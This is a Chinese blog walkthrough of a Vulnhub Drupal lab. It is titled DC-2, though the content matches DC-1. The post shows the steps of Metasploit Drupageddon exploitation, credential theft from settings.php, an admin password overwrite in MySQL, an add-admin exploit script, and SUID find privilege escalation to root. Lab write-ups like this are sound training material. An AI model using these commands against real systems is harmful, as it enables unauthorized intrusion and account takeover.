Vulnhub-DC-2

最新推荐文章于 2024-02-05 00:16:00 发布
最新推荐文章于 2024-02-05 00:16:00 发布
阅读量242 收藏 1
点赞数
分类专栏: Vulnhub 文章标签: DC
kaka
本文链接:https://blog.csdn.net/szlg510027010/article/details/107120453
版权

配置信息:

靶机下载地址:Vulnhub-DC

靶机:DC1 (VirtualBox)  IP:192.168.67.200

攻机:Kali (Local)     IP:192.168.67.109

目标:获取5个flag

开始游戏:

nmap -sn 192.168.67.0/24
获取目标IP地址:192.168.67.200

扫描目标信息:
nmap -A -p- 192.168.67.200
获取目标开放端口:22 [ssh] || 80[http] || 111[rpc]
获取目标系统信息:Linux 3.2 - 3.16

发现开放80端口,因此尝试登录网页,浏览器输入:http://192.168.67.200

左上方发现CMS为Drupal

CMS:Drupal7

Web servers:Apache2.2.22

Programming languages:PHP5.4.45

Operating system:Debian

JavaScript libraries:JQuery1.4.4 jQuery UI1.8.7

使用 wappalyzer 插件确认获取网站相关信息:
注:Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的网站技术分析插件

确认 CMS 为 Drupal,利用msfconsole获取meterpreter:(use rank:excellent)
search drupal
use exploit/multi/http/drupal_drupageddon
show options
set RHOSTS 192.168.67.200
exploit


在meterpreter下获取交互式反弹shell:
meterpreter > shell
python -c 'import pty;pyt.spawn("\bin\sh")'
$ ls

输入命令 ls 发现有一个 flag1.txt,果断查看它,这就得到了flag1
$ls
$cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you
每一个好的 CMS 都需要一个配置文件,你也如此。
根据falg1的提示,利用搜索引擎查询Drupal的配置文件


得到一个地址:/sites/default/settings.php —— 利用 more 查看全部信息
获取 flag2,这就得到了第二个 flag2
$more sites/default/settings.php
more sites/default/settings.php
<?php
/**
*
* flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
暴力破解和字典攻击并不是取得访问权限的唯一方式(你需要访问权限),利用这些凭证你能做什么?
这是 flag2 给我们留下的信息,再回看该配置文件,会发现这里有关于数据库的详细信息:
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
'prefix' => '',
),
尝试进入 mysql :
$ mysql -h localhost -u dbuser -p
mysql -h localhost -u dbuser -p
Enter password: R0ck3t
show databases;

use drupaldb;
show tables;
select * from users;
查询有哪些表时,可以很明显的看到有 users 这个表,果断 select 一发再说

这就得到了用户名和一串奇奇怪怪的密码,再次利用搜索引擎,可搜索:drupal7忘记密码怎么办?drupal7如何重置密码?drupal7如何修改密码?类似这些问题,让开发者或研究人士告诉我们答案


还真告诉了,直接重置管理员密码登录。
exit
$ls
$php ./scripts/password-hash.sh 123456
mysql -h localhost -u dbuser -p
Enter password:R0ck3t
use drupaldb;
update users set pass='$S$DQZsZLqxCbnNCRuvOFCQBC2snsbkjGrH3Xw4nqxxhuYIONkuC4dP' where name='admin';
登录成功

有时直接修改太过明目张胆,那么有没有较隐蔽的方法呢?有什么比较隐蔽的方法能够也是以管理员的身份去登录的呢?要不试试添加一个管理员帐号?

首先得知道版本号,看能否利用,一般在modules/system/system.info可以看到版本号,如果不知道,利用搜索引擎也可得知这一信息:


cat modules/system/system.info

得到该Drupal的版本为7.24

在kali上查询是否存在添加管理员漏洞可利用:
searchexploit drupal

发现有 Add Admin User 可以利用且版本符合条件
copy一份到家目录下,随后添加一个具有管理员权限的账户
cp /usr/share/exploitdb/exploits/php/webapps/34992.py /root/34992.py
cd ~
python 34992.py -h
python 34992.py -t http://192.168.67.200 -u whoami -p 123456
登录成功


随后浏览页面[每个按钮都去点],看有无新发现,在find content找到了flag3

点击 flag3,可以获得flag3详细信息:

特殊的PERMS可以帮助找到密码-但您需要-exec该命令来隐藏的内容。

很明显的提示:find+perms+exec 命令用来提权

首先利用 find 命令查看有哪些 suid 命令:

find / -perm -4000

利用 find 提权,find 提权有两种方式:

/这是第一种/
find ./ acce -exec '/bin/sh' \;

/这是第二种/
touch bcce
find bcce -exec '/bin/sh' \;

这就拿到了 root 权限,查找有无flag4

可以发现 flag4 是一个用户…
find / -name "flag4
cd /home/flag4
cat flag4.txt
你能利用同样的方法用root权限找到或访问到flag吗?

貌似我们已经进入了root环境下,竟然flag4在家目录下,那么flag5会不会在root目录下?
—— 找到 flag5:thefinalflag

游戏结束

总结:0:MSF 漏洞模块利用1:配置文件2:搜索引擎的合理应用3:提权

CrAcKeR-1
关注
专栏目录
VulnHub DC: 2 渗透测试
spider的博客
11-29 279
下载在虚拟机部署后 主机发现 flag1 nmap -sT -v 192.168.1.246 -sV -O -p- 我们在这发现开放了2个服务,直接访问80端口,发现重定向到域名/dc-2,去/etc/hosts 文件改一下就好。 打开页面,发现是一个wordpress的网站,发现flag1,提示用从cewl可以爬到密码 cewl http://dc-2 -w pwd.txt cat pwd.txt && wc -w pwd.txt cewl 密码长度可以指定的,得到一个238个密
Vulnhub DC Challenges之 DC-2
ST0new的博客
05-26 1958
前言 关于Vulnhub 以及DC,以及如何使用ova安装,我已经在DC-1中介绍了 ,今天带来第二弹,比第一弹难度稍微大一点,重点还是考察工具的使用和命令的熟练程度 附上链接Vulnhub DC Challenges之 DC-1 DC-2介绍 DC-2,我们主要是从web入手渗透拿到flag,需要大家对信息收集要有一定的了解,需要掌握的工具:nmap,hydra,cewl。 靶机环境 DC-2...
vulnhub靶机:DC-2
Keepb1ue的博客
09-29 2672
靶机配置说明 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 靶机:DC1 (VirtualBox) IP:192.168.56.111 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中也有详细的靶机说明,而FunBox需要寻找的flag总数为5个 靶机环境配置: 还是一样,将其桥接到同一张网卡即可。 靶机渗透开始: kali IP: 第一步还是需要确定目标IP 确定目标ip为192.168.56.111后nmap扫描下端
DC1(VulnHub)
最新发布
carmi的博客
02-05 416
DC1(VulnHub) 1 2 3 4、flag1提示 flag1提示:Every good CMS needs a config file - and so do you. 5、flag2提示 flag2提示:Brute force and dictionary attacks aren't the only ways to gain access (and you WILL ne...
Vulnhub -- DC1靶机渗透
Gh0st_1n_The_Shell的博客
06-02 167
信息收集 开启了 22端口,ssh服务 80,http服务 111,RPC服务 先观察80端口 发现采用的是Drupal的cms 目录爆破: 但是,没有找到可以直接利用的点 登录的页面进行SQL注入即不报错,也不执行SQL语句 无法爆破出用户,尝试以账号名admin盲爆密码 发现后面长度都变为8497了 打开一看,发现原来有限制登录次数,看来暴力破解是无效了 创建用户界面需要填入邮箱,但是填入后并不会发送邮件过来,可能只是个摆设 只能在msf搜索关于这个cms的漏洞 直接用次新的 .
Vulnhub-DC-2靶场渗透练习
weixin_52451257的博客
11-13 3657
Vulbhub-DC2 靶场地址:DC: 2 ~ VulnHub 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 Vi /etc/hosts 靶机ip dc-2 第一步:信息收集 nmap –sS 192.168.231.0/24 nmap -A -p- 192.168.231.140 扫描目录信息, 扫描目录目前掌握 dirb,nikto,dirmap,dirsearch dirb http://192.168.231.140 nikto -h htt...
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1699
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.csdn.net/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
靶机实操:vulnhub-DC3
不想当脚本小子的脚本小子
12-06 197
今天继续趁着回家来用DC练练手。照旧先是扫一下内网主机,我一般喜欢先找一下存活的主机然后再查看具体的信息,扫描到IP为192.168.249.135。只开放了80端口 访问网页长这样:发现有一个右下角forget操作,一会看看这里有没有可以操作的地方。CMS是Joomla,中间件会不会存在漏洞? 接下来常规操作。查看robots没东西,那再扫扫后台,挑几个觉得有用的打开看看。总觉得最终的落脚点会在刚才的忘记用户名和密码那里,一会看看会不会被打脸哈哈哈哈 登录界面先简单sql..
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub DC-1
weixin_45682839的博客
04-13 380
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub | DC: 1 |【实战】
bin789456的博客
05-12 407
写在前面 来做做实战吧,学习攻击思路,和一些安全工具的熟悉 主机发现
DC1靶机渗透学习
weixin_56537388的博客
08-06 56
既然是有80端口,先看80端口,发现网站是Drupal搭建的,有一个登录框,可能可以尝试sql注入,暴力破解,先扫其他目录。登录发现flag3,flag3提示,提权并提示 -exec,想到suid提权 find 命令。在drupaldb的users表发现admin用户,密码是加密的,搜索发现解决方法。changelog.txt和robots.txt都是有用的数据。对端口进行进一步扫描,扫描服务器版本,操作系统,端口详细信息。Drupal的数据库配置文件在。确定目标,扫描存活主机。建立交互式shell。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2581
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
DC-1靶场渗透测试实验整理
u013930899的博客
09-10 2239
DC-1实验
DC-1靶机渗透(教程以及思路)
菜菜的博客
10-20 2985
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
跟随小破站学习my sql第一天
Mars_LJ的博客
11-23 503
安装的是数据库的服务端! 修改端口号:前往C:\Program Files (x86)\MySQL\MySQL Server 版本号\my.ini 中找到sqlb 当-p后想输入密码时 无需添加空格 直接输入密码即可! 查看客户端版本号 ...
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4828
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
Vulnhub:DC-1练习
12345元的博客
08-05 349
靶机介绍 download靶机 https://www.vulnhub.com/entry/dc-1,292/ DC-1的介绍如下 这个靶机需要获得root权限,并找到所有的5个flag 主机发现、扫描IP DC-1是和我们在同一个局域网,我们可以使用arp-scan去主机发现,命令如下 arp-scan -l 发现第三个是目标主机,ip:172.16.183.135 namp端口扫描 nmap...
DC-1靶机渗透测试记录
qq_33163046的博客
12-18 9734
攻击机 kali-linux-2020.4-vbox-i386 设置 USB设备关闭,网络连接方式仅主机(Host-Only)网络。 攻击机IP 192.168.56.103 步骤1 靶机目标发现 因为靶机和攻击机在同一个网络内,所以使用KALI上arp-scan -l 进行扫描。扫描确定了靶机的IP是192.168.56.102。 ┌──(root??kali)-[~] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 08:00:27:83:c
DC-DC电路电感选择深度解析
"DC-DC电路中电感的选择关乎到开关电源设计的效率与稳定性。电感不仅是LC滤波电路的组成部分,其行为在开关电源的降压转换中扮演着关键角色。电感的选择需要考虑电感值、电流承受能力、绕线电阻以及机械尺寸等因素。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值